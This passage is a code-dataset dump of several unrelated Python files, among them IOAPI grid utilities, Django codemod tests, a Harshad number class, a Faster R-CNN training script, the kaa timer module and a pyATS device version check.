len(var_list)\n setattr(self, 'VAR-LIST', ''.join([var.ljust(16) for var in var_list]))\n # Currently only gridded / type 1 is supported\n self.FTYPE = 1\n self.SDATE = int(sdate)\n self.IOAPI_VERSION = 'FAUX IO'.ljust(80)\n self.EXEC_ID = '?'.ljust(80)\n self.CDATE = self.WDATE = int(time.strftime('%Y%j'))\n self.CTIME = self.WTIME = int(time.strftime('%H%M%S'))\n self.UPNAM = 'FI'.ljust(16)\n self.FILEDESC = 'FAUX IO'.ljust(80)\n self.HISTORY = ' '\n self.STIME = 0\n self.TSTEP = 10000 # One hour per step default\n # Vertical levels. Assume 1.\n self.NLAYS = len(self.dimensions['LAY'])\n self.VGTYP = -1\n self.VGTOP = np.zeros([1], np.float32)\n self.VGLVLS = np.zeros([2], np.float32)\n # Override any attribute with a keyword arg\n for att, val in list(kwargs.items()):\n setattr(self, att, val) \n\n def calc_stride(self):\n '''\n Calculate the stride of the time step based on the TSTEP attribute\n Takes HHMMSS and returns seconds.\n '''\n tstep = '%0.6d' %self.TSTEP\n if tstep.startswith('-'):\n sign = -1\n tstep = tstep[1:]\n else:\n sign = 1\n step = int(tstep[:-4])*3600 + int(tstep[-4:-2])*60 + int(tstep[-2:])\n return sign * step\n\n def write_TFLAG(self):\n '''\n Create the TFLAG timesteps for the variables in the file\n based on defined SDATE, number of variables and variable timesteps\n '''\n arr = np.zeros([len(self.dimensions['TSTEP']), len(self.dimensions['VAR']), \n len(self.dimensions['DATE-TIME'])], np.int32)\n # Time independent data gets all 0s for each variable\n if arr.shape[0] > 1:\n stride = self.calc_stride()\n cur_time = datetime.strptime(str(self.SDATE) + '%0.6d' %int(self.STIME), '%Y%j%H%M%S')\n for tstep in range(arr.shape[0]):\n for tvar in range(arr.shape[1]):\n arr[tstep,tvar,0] = datetime.strftime(cur_time, '%Y%j') # Set date for TFLAG timestep\n arr[tstep,tvar,1] = datetime.strftime(cur_time, '%H%M%S') # Set time for TFLAG timestep\n cur_time += timedelta(seconds=stride)\n self.variables['TFLAG'][:] = arr\n self.sync()\n\nclass Grid(object):\n \"\"\"\n Reads the grid description file and loads the grid information for the specified grid named.\n \"\"\"\n def __init__(self, grid_name, grid_desc):\n self.GDNAM = grid_name\n self.load_gridinfo(grid_desc)\n self.grid_atts = ['GDTYP','GDNAM','GDTYP','P_ALP','P_BET','P_GAM','XCENT','YCENT','XORIG',\n 'YORIG','XCELL','YCELL','NCOLS','NROWS','NTHIK']\n\n def _parse_float(self, x):\n \"\"\"\n Returns a floating point with the correct number of trailing zeros based on the .Dx\n \"\"\"\n x = x.replace('D','E') \n return np.float64(x)\n\n def _split_line(self, line):\n return [cell.strip().strip(\"'\") for cell in line.strip().split('!')[0].split(',')]\n\n def load_gridinfo(self, grid_desc):\n \"\"\"\n Read in the grid description file and store the grid data as object attributes\n \"\"\"\n with open(grid_desc) as gd:\n state = 'proj'\n proj_table = dict()\n for line in gd:\n s_line = self._split_line(line)\n if state == 'proj':\n if s_line[0]:\n if s_line[0] == ' ':\n state = 'grid'\n else:\n proj_name = line.strip().strip(\"'\")\n line = next(gd)\n s_line = self._split_line(line)\n proj_table[proj_name] = {'GDTYP': int(s_line[0]),\n 'P_ALP': self._parse_float(s_line[1]),\n 'P_BET': self._parse_float(s_line[2]),\n 'P_GAM': self._parse_float(s_line[3]),\n 'XCENT': self._parse_float(s_line[4]),\n 'YCENT': self._parse_float(s_line[5])}\n else:\n if s_line[0] == self.GDNAM:\n line = next(gd)\n s_line = self._split_line(line)\n proj_name = s_line[0]\n self.XORIG, self.YORIG, self.XCELL, self.YCELL = \\\n [self._parse_float(x) for x in s_line[1:5]]\n self.NCOLS, self.NROWS, self.NTHIK = [int(x) for x in s_line[5:8]]\n for k, v in list(proj_table[proj_name].items()):\n setattr(self, k, v)\n break\n if state == 1: \n raise ValueError('Grid %s not found in grid description file.' %self.gdnam)\n\n\n","sub_path":"emisqa/io/fauxio.py","file_name":"fauxio.py","file_ext":"py","file_size_in_byte":8687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"273241680","text":"import json\nimport subprocess\nimport os\nimport nose\n\ndef test_arma():\n cleaning()\n env = dict(os.environ)\n env['PYTHONPATH'] = \".\"\n s = subprocess.check_output(['cyclus', '-o', 'dummy.h5', 'test.json'], universal_newlines=True, env=env)\n # Testing Building Reactors \n with open('POWER.txt') as f:\n rx_hist = f.readlines()\n reactors, power = read_info(rx_hist)\n assert reactors > 0\n assert power < 0\n # Testing building mines\n with open('uranium.txt') as f:\n mine_hist = f.readlines()\n mine, uranium = read_info(mine_hist)\n assert mine > 0\n assert uranium < 0\n cleaning()\n\ndef cleaning():\n if os.path.exists('dummy.h5'):\n os.remove('dummy.h5')\n if os.path.exists('POWER.txt'):\n os.remove('POWER.txt')\n if os.path.exists('uranium.txt'):\n os.remove('uranium.txt')\n \ndef read_info(text):\n diff = []\n #check to see if facilities are deployed\n first = float(text[0].split()[3])\n last = float(text[-1].split()[3])\n built = last > first\n #check to make sure overprediction occurs\n for line in text:\n vals = line.split()\n diff.append((float(vals[7])-float(vals[5]))/float(vals[7]))\n avg = sum(diff)/len(diff)\n return built, avg\n","sub_path":"tests/no_inst_tests.py","file_name":"no_inst_tests.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"58418521","text":"from django_codemod.visitors.django_40 import (\n ForceTextToForceStrTransformer,\n SmartTextToForceStrTransformer,\n UGetTextLazyToGetTextLazyTransformer,\n UGetTextNoopToGetTextNoopTransformer,\n UGetTextToGetTextTransformer,\n UNGetTextLazyToNGetTextLazyTransformer,\n UNGetTextToNGetTextTransformer,\n URLToRePathTransformer,\n)\n\nfrom .base import BaseVisitorTest\n\n\nclass TestForceTextToForceStrTransformer(BaseVisitorTest):\n\n transformer = ForceTextToForceStrTransformer\n\n def test_simple_substitution(self) -> None:\n before = \"\"\"\n from django.utils.encoding import force_text\n\n result = force_text(content)\n \"\"\"\n after = \"\"\"\n from django.utils.encoding import force_str\n\n result = force_str(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestSmartTextToForceStrTransformer(BaseVisitorTest):\n\n transformer = SmartTextToForceStrTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.encoding import smart_text\n\n result = smart_text(content)\n \"\"\"\n after = \"\"\"\n from django.utils.encoding import smart_str\n\n result = smart_str(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUGetTextToGetTextTransformer(BaseVisitorTest):\n\n transformer = UGetTextToGetTextTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext\n\n result = ugettext(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext\n\n result = gettext(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n def test_import_with_alias(self) -> None:\n \"\"\"Check case with a common alias.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext as _\n\n result = _(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext as _\n\n result = _(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n def test_already_imported_substitution(self) -> None:\n \"\"\"Test case where gettext is already in the imports.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext, gettext\n\n result = ugettext(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext\n\n result = gettext(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUGetTextLazyToGetTextLazyTransformer(BaseVisitorTest):\n\n transformer = UGetTextLazyToGetTextLazyTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext_lazy\n\n result = ugettext_lazy(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext_lazy\n\n result = gettext_lazy(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUGetTextNoopToGetTextNoopTransformer(BaseVisitorTest):\n\n transformer = UGetTextNoopToGetTextNoopTransformer\n\n def test_noop(self) -> None:\n \"\"\"Test when nothing should change.\"\"\"\n before = \"\"\"\n from django import conf\n from django.utils import translation\n\n foo = gettext_noop(\"bar\")\n \"\"\"\n after = \"\"\"\n from django import conf\n from django.utils import translation\n\n foo = gettext_noop(\"bar\")\n \"\"\"\n\n self.assertCodemod(before, after)\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext_noop\n\n result = ugettext_noop(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext_noop\n\n result = gettext_noop(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUNGetTextToNGetTextTransformer(BaseVisitorTest):\n\n transformer = UNGetTextToNGetTextTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ungettext\n\n result = ungettext(content, plural_content, count)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import ngettext\n\n result = ngettext(content, plural_content, count)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUNGetTextLazyToNGetTextLazyTransformer(BaseVisitorTest):\n\n transformer = UNGetTextLazyToNGetTextLazyTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ungettext_lazy\n\n result = ungettext_lazy(content, plural_content, count)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import ngettext_lazy\n\n result = ngettext_lazy(content, plural_content, count)\n \"\"\"\n self.assertCodemod(before, after)\n\n def test_import_as_alias(self) -> None:\n \"\"\"Check with a common import alias.\"\"\"\n before = \"\"\"\n from django.utils.translation import ungettext_lazy as _\n\n result = _(content, plural_content, count)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import ngettext_lazy as _\n\n result = _(content, plural_content, count)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestURLToRePathTransformer(BaseVisitorTest):\n\n transformer = URLToRePathTransformer\n\n def test_noop(self) -> None:\n \"\"\"Test when nothing should change.\"\"\"\n before = \"\"\"\n from django.urls import include, re_path\n\n urlpatterns = [\n re_path(r'^index/$', views.index, name='index'),\n re_path(r'^weblog/', include('blog.urls')),\n ]\n \"\"\"\n after = \"\"\"\n from django.urls import include, re_path\n\n urlpatterns = [\n re_path(r'^index/$', views.index, name='index'),\n re_path(r'^weblog/', include('blog.urls')),\n ]\n \"\"\"\n\n self.assertCodemod(before, after)\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.urls import include\n from django.conf.urls import url\n\n urlpatterns = [\n url(r'^index/$', views.index, name='index'),\n url(r'^weblog/', include('blog.urls')),\n ]\n \"\"\"\n after = \"\"\"\n from django.urls import re_path, include\n\n urlpatterns = [\n re_path(r'^index/$', views.index, name='index'),\n re_path(r'^weblog/', include('blog.urls')),\n ]\n \"\"\"\n self.assertCodemod(before, after)\n","sub_path":"tests/visitors/test_django_40.py","file_name":"test_django_40.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"7843152","text":"class Harshad:\n\n @staticmethod\n def is_valid(number):\n sum_digits = sum([int(s) for s in str(number)])\n return bool(not number % sum_digits)\n\n @staticmethod\n def get_next(number):\n result = number + 1\n while Harshad.is_valid(result) is False:\n result += 1\n return result\n\n @staticmethod\n def get_series(count, start=0):\n result = []\n c = 0\n while c < count:\n nxt = Harshad.get_next(start)\n result.append(Harshad.get_next(start))\n c += 1\n start = nxt\n return result\n","sub_path":"tasks/harshad_numbers/src/harshad_numbers.py","file_name":"harshad_numbers.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"88872826","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2018/10/29 10:38\n\n@author: royce.mao\n\nFaster_rcnn 第2阶段,根据share的feature map以及rpn生成并映射的RoIs,组织具体类别的分类,和排除背景类的回归。\n\"\"\"\nfrom __future__ import division\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import TimeDistributed, Dense, Flatten, Input\nfrom nms import nms\nfrom voc_data import voc_final\nfrom rpn_train import regr_revise, resnet50_rpn, predict, regr_revise\nfrom RoiPoolingConv import RoiPoolingConv\nfrom frcnn_loss import class_loss_cls, class_loss_regr\nfrom roi_pooling import cls_target, regr_target, proposal_to_roi\nfrom anchor import anchors_generation, sliding_anchors_all, pos_neg_iou\nfrom net_layers import resnet50, roi_pooling_layer, fast_rcnn_layer\nfrom keras.utils import plot_model\nimport numpy as np\nimport time\n\ndef res_roi_frcnn(max_boxes, pooling_size, nb_classes):\n \"\"\"\n 第2阶段,resnet50的基础特征提取网络 + roi pooling conv结构(特征映射) + cls_layer、regr_layer\n :param rois_map: rpn网络生成的feature map对应的rois\n :param cls_target: 分类目标\n :param regr_target: 回归目标\n :param num_rois: 一个batch图片对应的rois数量\n :return: \n \"\"\"\n # input_tensor包括两个方面:1、feature map;2、rois\n input_rois = Input(shape=(max_boxes, 4)) # rois input\n input_shape = (max_boxes, 14, 14, 1024)\n # resnet50的16倍下采样的feature map\n input_tensor, base_layer = resnet50() # feature_map input(size是原图size,经过resnet50基础网络,成为feature_map size)\n # 结合feature map与feature map上对应映射的RoIs,做roi_pooling\n out_roi_pool = RoiPoolingConv(pooling_size, max_boxes)([base_layer, input_rois])\n ## 输出的是(None, num_rois, 14, 14, 1024)的子feature maps\n out_fast_rcnn = fast_rcnn_layer(out_roi_pool, input_shape=input_shape, trainable=True)\n ## 输出的是(None, num_rois, 1, 1, 2048)的子feature map\n # 因为是对num_rois个子feature maps分别处理的,这里使用timedistributed进行封装\n out = TimeDistributed(Flatten())(out_fast_rcnn)\n # 最终分支,同样使用封装器TimeDistributed来封装Dense,以产生针对各个时间步信号的独立全连接\n out_cls = TimeDistributed(Dense(nb_classes, activation='softmax', kernel_initializer='zero'),\n name='dense_class_{}'.format(nb_classes))(out)\n ## (nb_classes-1)忽略了‘bg’背景类\n out_regr = TimeDistributed(Dense(4 * (nb_classes - 1), activation='linear', kernel_initializer='zero'),\n name='dense_regress_{}'.format(nb_classes))(out)\n model = Model(inputs=[input_tensor, input_rois], outputs=[out_cls, out_regr], name='cls_regr_layer')\n # model.summary()\n return model\n\n\ndef gen_data_frcnn(model_rpn, all_images, all_annotations, batch_size=1):\n \"\"\"\n 生成器(迭代器),用于fit_generator边训练边生成训练数据\n :param all_anchors: \n :param all_images: \n :param all_annotations: \n :param batch_size: \n :return: \n \"\"\"\n # 一个一个batch生成训练所需的参数\n length = len(all_images)\n while True:\n for i in np.random.randint(0, length, size=batch_size):\n # model预测\n predict_imgs = predict(model_rpn, np.array(all_images[i][np.newaxis, :, :]))\n dx = predict_imgs[1].reshape(1, 1764, 4)[:, :, 0] # 1764=14*14*9\n dy = predict_imgs[1].reshape(1, 1764, 4)[:, :, 1]\n dw = predict_imgs[1].reshape(1, 1764, 4)[:, :, 2]\n dh = predict_imgs[1].reshape(1, 1764, 4)[:, :, 3]\n all_proposals = regr_revise(all_anchors, dx, dy, dw, dh)\n # 生成proposals\n proposals, probs = nms(np.column_stack((all_proposals, predict_imgs[0].ravel())), thresh=0.9,\n max_boxes=max_boxes)\n # print(type(np.array((all_annotations[i]))[0]))\n rois_pic, cls, pos_index, max_index = cls_target(proposals, np.array((all_annotations[i])),\n classifier_min_overlap=0.1, classifier_max_overlap=0.5)\n shift = regr_target(rois_pic, np.array((all_annotations[i])), pos_index, max_index)\n rois_map = proposal_to_roi(rois_pic, stride)\n # 特征量:img、rois两个输入\n x = [all_images[i][np.newaxis, :, :], rois_map[np.newaxis, :, :]] # [1, num_rois, 4]\n # 标签量:cls、regr两个输出\n # y = [np.array((cls))[np.newaxis, :][:, :, np.newaxis], revise[np.newaxis, :, :]] # [1, num_rois, 20]、[1, num_rois, 80]\n # 开始将y转换为用于计算loss的y_true标签量\n ## y1分类目标(第3维列数等于nb_classe)\n y1 = np.zeros((max_boxes, nb_classes))\n for i in range(max_boxes):\n '''\n if cls[i] == 0.0:\n y1[i] = [0, 0, 1]\n '''\n if cls[i] != 0.0:\n a = np.zeros(nb_classes)\n a[class_mapping[cls[i]]] = 1\n y1[i] = a\n ## y2回归目标(第3维前4*(nb_classes-1)列是y1类别的repeat,用于标定正样本,后4*(nb_classes-1)列是对应正样本的真实回归目标)\n y2_true = np.zeros((max_boxes, 4*(nb_classes-1)))\n j = 0\n for i in range(max_boxes):\n if cls[i] in class_mapping.keys() and cls[i] != 'bg':\n a = np.zeros(4*(nb_classes-1))\n a[4*class_mapping[cls[i]] : 4*class_mapping[cls[i]]+4] = shift[j]\n y2_true[i] = a\n j += 1\n y2 = np.concatenate([np.repeat(y1[np.newaxis, :, :][:, :, :(nb_classes-1)], 4, axis=2), y2_true[np.newaxis, :, :]], axis=2)\n y = [y1[np.newaxis, :, :], y2]\n yield x, y\n\n\ndef train(model_rpn, max_boxes, pooling_size, nb_classes):\n \"\"\"\n 训练过程\n :param input_tensor: \n :param rois_map: \n :param out_cls: \n :param out_regr: \n :param nb_classes: \n :return: \n \"\"\"\n # 【必须在train函数里面predict调用一下,不然generator函数里面直接调用会报错???】\n predict(model_rpn, np.array(all_images[0][np.newaxis, :, :]))\n model_fastrcnn = res_roi_frcnn(max_boxes, pooling_size, nb_classes)\n plot_model(model_fastrcnn, to_file='F:\\\\VOC2007\\\\model_fast_rcnn.png')\n try:\n print('loading weights from {}'.format('resnet50_weights_tf_dim_ordering_tf_kernels.h5'))\n model_fastrcnn.load_weights('F:\\\\VOC2007\\\\resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5', by_name=True)\n print('加载预训练权重成功!')\n except:\n print('加载预训练权重失败!')\n adam = Adam(lr=1e-5)\n model_fastrcnn.compile(optimizer=adam,\n loss=[class_loss_cls, class_loss_regr(nb_classes - 1)],\n metrics={'dense_class_{}'.format(nb_classes): 'accuracy'})\n print(\"[INFO]二阶段网络Fast_rcnn开始训练........\")\n history = model_fastrcnn.fit_generator(\n generator=gen_data_frcnn(model_rpn, all_images, all_annotations, batch_size=1),\n steps_per_epoch=1,\n epochs=25)\n return model_fastrcnn\n\n\nif __name__ == \"__main__\":\n # 新增参数\n nb_classes = None # 总的类别数量\n max_boxes = 7 # 单张图片nms界定的rois数量【超过7就报错???】\n pooling_size = 14 # pooling的size\n # 准备voc的GT标注数据集\n data_path = \"F:\\\\VOC2007\"\n width = 14\n height = 14\n stride = [16, 16]\n class_mapping, classes_count, all_images, all_annotations = voc_final(data_path)\n nb_classes = len(class_mapping) + 1 # 类别数赋值,加上‘bg’类\n class_mapping['bg'] = len(class_mapping) # class_mapping字典新增‘bg’类\n # 生成所有映射回原图的anchors\n anchors = anchors_generation()\n all_anchors = sliding_anchors_all([width, height], stride, anchors)\n # 加载已训练的rpn模型权重\n model_rpn = resnet50_rpn(9)\n model_rpn.load_weights('F:\\\\VOC2007\\\\rpn.hdf5')\n print('RPN模型加载完毕!(用于训练中生成Proposals)')\n # 开始边生成数据边训练\n start_time = time.time()\n model_fast_rcnn = train(model_rpn, max_boxes, pooling_size, nb_classes)\n # model_fast_rcnn.save_weights('F:\\\\VOC2007\\\\fast_rcnn.hdf5')\n end_time = time.time()\n print(\"时间消耗:{}秒\".format(end_time - start_time))\n","sub_path":"frcnn_train.py","file_name":"frcnn_train.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"256798426","text":"# -*- coding: iso-8859-1 -*-\n# -----------------------------------------------------------------------------\n# timer.py - Timer classes for the main loop\n# -----------------------------------------------------------------------------\n# $Id: timer.py 4070 2009-05-25 15:32:31Z tack $\n#\n# -----------------------------------------------------------------------------\n# kaa.base - The Kaa Application Framework\n# Copyright 2005-2009 Dirk Meyer, Jason Tackaberry, et al.\n#\n# Please see the file AUTHORS for a complete list of authors.\n#\n# This library is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License version\n# 2.1 as published by the Free Software Foundation.\n#\n# This library is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA\n# 02110-1301 USA\n#\n# -----------------------------------------------------------------------------\n\n__all__ = [ 'timed', 'Timer', 'WeakTimer', 'OneShotTimer', 'WeakOneShotTimer',\n 'AtTimer', 'OneShotAtTimer', 'POLICY_ONCE', 'POLICY_MANY',\n 'POLICY_RESTART' ]\n\nimport logging\nimport datetime\n\nimport nf_wrapper as notifier\nfrom thread import threaded, MAINTHREAD\nfrom weakref import weakref\nfrom utils import wraps, DecoratorDataStore, property\n\nPOLICY_ONCE = 'once'\nPOLICY_MANY = 'many'\nPOLICY_RESTART = 'restart'\n\n# get logging object\nlog = logging.getLogger('base')\n\n\ndef timed(interval, timer=None, policy=POLICY_MANY):\n \"\"\"\n Decorator to call the decorated function in a Timer. When calling the\n function, a timer will be started with the given interval calling that\n function. The decorated function will be called from the main thread.\n\n The timer parameter optionally specifies which timer class should be\n used to wrap the function. kaa.Timer (default) or kaa.WeakTimer will\n repeatedly invoke the decorated function until it returns False.\n kaa.OneShotTimer or kaa.WeakOneShotTimer will invoke the function once,\n delaying it by the specified interval. (In this case the return value\n of the decorated function is irrelevant.)\n\n The policy parameter controls how multiple invocations of the decorated\n function should be handled. By default (POLICY_MANY), each invocation of\n the function will create a new timer, each firing at the specified\n interval. If policy is POLICY_ONCE, subsequent invocations are ignored\n while the first timer is still active. If the policy is POLICY_RESTART,\n subsequent invocations will restart the first timer.\n\n Note that in the case of POLICY_ONCE or POLICY_RESTART, if the timer is\n currently running, any arguments passed to the decorated function on\n subsequent calls will be discarded.\n \"\"\"\n if not policy in (POLICY_MANY, POLICY_ONCE, POLICY_RESTART):\n raise RuntimeError('Invalid @kaa.timed policy %s' % policy)\n\n def decorator(func):\n @wraps(func)\n def newfunc(*args, **kwargs):\n if policy == POLICY_MANY:\n # just start the timer\n t = (timer or Timer)(func, *args, **kwargs)\n t.start(interval)\n return True\n store = DecoratorDataStore(func, newfunc, args)\n # check current timer\n if 'timer' in store and store.timer and store.timer.active:\n if policy == POLICY_ONCE:\n # timer already running and not override\n return False\n # stop old timer\n store.timer.stop()\n # create new timer, store it in the object and start it\n t = (timer or Timer)(func, *args, **kwargs)\n store.timer = weakref(t)\n t.start(interval)\n return True\n return newfunc\n\n return decorator\n\n\n\nclass Timer(notifier.NotifierCallback):\n \"\"\"\n Invokes the supplied callback after the supplied interval (passed to\n :meth:`~kaa.Timer.start`) elapses. The Timer is created stopped.\n\n When the timer interval elapses, we say that the timer is \"fired\" or\n \"triggered,\" at which time the given callback is invoked.\n\n If the callback returns False, then the timer is automatically stopped.\n If it returns any other value (including None), the timer will continue\n to fire.\n \"\"\"\n\n __interval = None\n\n def __init__(self, callback, *args, **kwargs):\n \"\"\"\n :param callback: the callable to be invoked\n :param args: the arguments to be passed to the callable when it's invoked\n :param kwargs: the keyword arguments to be passed to the callable when it's invoked\n \"\"\"\n super(Timer, self).__init__(callback, *args, **kwargs)\n self.restart_when_active = True\n\n\n @threaded(MAINTHREAD)\n def start(self, interval):\n \"\"\"\n Start the timer, invoking the callback every *interval* seconds.\n\n If the timer is already running, it is stopped and restarted with\n the given interval. The timer's precision is at the mercy of other\n tasks running in the main loop. For example, if another task\n (a different timer, or I/O callback) blocks the mainloop for longer\n than the given timer interval, the callback will be invoked late.\n\n :param interval: interval between invocations of the callback, in seconds\n \"\"\"\n if self.active:\n if not self.restart_when_active:\n return\n self.unregister()\n self._id = notifier.timer_add(int(interval * 1000), self)\n self.__interval = interval\n\n\n @property\n def interval(self):\n \"\"\"\n Timer interval when the timer is running, None if not. The interval\n cannot be changed once the timer is started, and it is set via the\n :meth:`~kaa.Timer.start` method.\n \"\"\"\n return self.__interval\n\n\n @threaded(MAINTHREAD)\n def stop(self):\n \"\"\"\n Stop a running timer.\n\n This method can be called safely even if the timer is already stopped.\n \"\"\"\n self.unregister()\n\n\n def unregister(self):\n \"\"\"\n Removes the timer from the notifier.\n\n This is considered an internal function (required to be implemented by\n subclasses of NotifierCallback). User should use stop() instead.\n \"\"\"\n if self.active:\n notifier.timer_remove(self._id)\n super(Timer, self).unregister()\n self.__interval = None\n\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Run the callback. (This is done internally by the notifier; the user will\n generally never do this directly.)\n \"\"\"\n if not self.active:\n # This happens if previous timer that has been called\n # during the same step has stopped us. This should not\n # happen anymore.\n log.error('calling callback on inactive timer (%s)' % repr(self))\n return False\n return super(Timer, self).__call__(*args, **kwargs)\n\n\nclass WeakTimer(notifier.WeakNotifierCallback, Timer):\n \"\"\"\n Weak variant of the Timer class.\n\n All references to the callback and supplied args/kwargs are weak\n references. When any of the underlying objects are deleted,\n the WeakTimer is automatically stopped.\n \"\"\"\n pass\n\n\nclass OneShotTimer(Timer):\n \"\"\"\n A Timer that gets triggered exactly once when it is started. Useful\n for deferred one-off tasks.\n\n Gotcha: it is possible to restart a OneShotTimer from inside the\n callback it invokes, however be careful not to return False in this\n case, otherwise the freshly started OneShotTimer will be implicitly\n stopped before it gets a chance to fire.\n \"\"\"\n def __call__(self, *args, **kwargs):\n self.unregister()\n super(Timer, self).__call__(*args, **kwargs)\n return False\n\n\nclass WeakOneShotTimer(notifier.WeakNotifierCallback, OneShotTimer):\n \"\"\"\n Weak variant of the OneshotTimer class.\n\n All references to the callback and supplied args/kwargs are weak\n references. When any of the underlying objects are deleted,\n the WeakTimer is automatically stopped.\n \"\"\"\n pass\n\n\nclass OneShotAtTimer(OneShotTimer):\n \"\"\"\n A timer that is triggered at a specific time of day. Once the timer fires\n it is stopped.\n \"\"\"\n def start(self, hour=range(24), min=range(60), sec=0):\n \"\"\"\n Starts the timer, causing it to be fired at the specified time.\n\n By default, the timer will fire every minute at 0 seconds. The timer\n has second precision.\n\n :param hour: the hour number (0-23) or list of hours\n :type hour: int or list of ints\n :param min: the minute number (0-59) or list of minutes\n :type min: int or list of ints\n :param sec: the second number (0-59) or list of seconds\n :type sec: int or list of ints\n \"\"\"\n if not isinstance(hour, (list, tuple)):\n hour = [ hour ]\n if not isinstance(min, (list, tuple)):\n min = [ min ]\n if not isinstance(sec, (list, tuple)):\n sec = [ sec ]\n\n self._timings = hour, min, sec\n self._last_time = datetime.datetime.now()\n self._schedule_next()\n\n\n def _schedule_next(self):\n \"\"\"\n Internal function to calculate the next callback time and\n schedule it.\n \"\"\"\n hour, min, sec = self._timings\n now = datetime.datetime.now()\n # Take the later of now or the last scheduled time for purposes of\n # determining the next time. If we use the current system time\n # instead, we may end up firing a callback twice for a given time,\n # because due to imprecision we may end up here slightly before (a few\n # milliseconds) the scheduled time.\n t = max(self._last_time, now).replace(microsecond = 0)\n\n next_sec = [ x for x in sec if t.second < x ]\n next_min = [ x for x in min if t.minute < x ]\n next_hour = [ x for x in hour if t.hour < x ]\n\n if next_sec:\n next = t.replace(second = next_sec[0])\n elif next_min:\n next = t.replace(minute = next_min[0], second = sec[0])\n elif next_hour:\n next = t.replace(hour = next_hour[0], minute = min[0], second = sec[0])\n else:\n tmrw = t + datetime.timedelta(days = 1)\n next = tmrw.replace(hour = hour[0], minute = min[0], second = sec[0])\n\n delta = next - now\n super(OneShotAtTimer, self).start(delta.seconds + delta.microseconds / 1000000.0)\n self._last_time = next\n\n\nclass AtTimer(OneShotAtTimer):\n \"\"\"\n A timer that is triggered at a specific time or times of day.\n \"\"\"\n def __call__(self, *args, **kwargs):\n if super(Timer, self).__call__(*args, **kwargs) != False:\n self._schedule_next()\n","sub_path":"env/lib/python2.7/site-packages/kaa/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":11203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"390823346","text":"# import the aetest module\nfrom pyats import aetest\nimport logging\nimport os\n\nlogger = logging.getLogger(__name__)\n\nclass CommonSetup(aetest.CommonSetup):\n \n @aetest.subsection\n def connect_to_devices(self, testbed):\n \n for device in testbed:\n # don't do the default show version\n # don't do the default config\n device.connect(init_exec_commands=[],\n init_config_commands=[],\n log_stdout=False)\n \n logger.info('{device} connected'.format(device=device.alias))\n\nclass CheckVersion(aetest.Testcase):\n\n @aetest.test\n def check_current_version(self, testbed):\n\n # Local vars\n test_success = True\n xe_version = '16.9.3'\n xr_version = '6.5.3'\n fail_devices = []\n\n for device in testbed:\n \n #Learning platform information\n platform = device.learn('platform')\n\n # We use .lower() so we're not case sensitive\n if (platform.os.lower() == 'iosxe' and platform.version != xe_version): \n test_success = False\n fail_devices.append(device.alias)\n\n # We use .lower() so we're not case sensitive\n if (platform.os.lower() == 'iosxr' and platform.version != xr_version): \n test_success = False\n fail_devices.append(device.alias)\n\n logger.debug('{device} running {platformos} has OS: {os}'.format(device=device.alias, platformos=platform.os, os=platform.version))\n\n # If we have devices with the wrong OS, print their names\n assert test_success == True, 'List of fail devices: {list}'.format(list=fail_devices)\n\nclass CommonCleanup(aetest.CommonCleanup):\n\n @aetest.subsection\n def disconnect_from_devices(self, testbed):\n \n for device in testbed:\n device.disconnect()\n\nif __name__ == 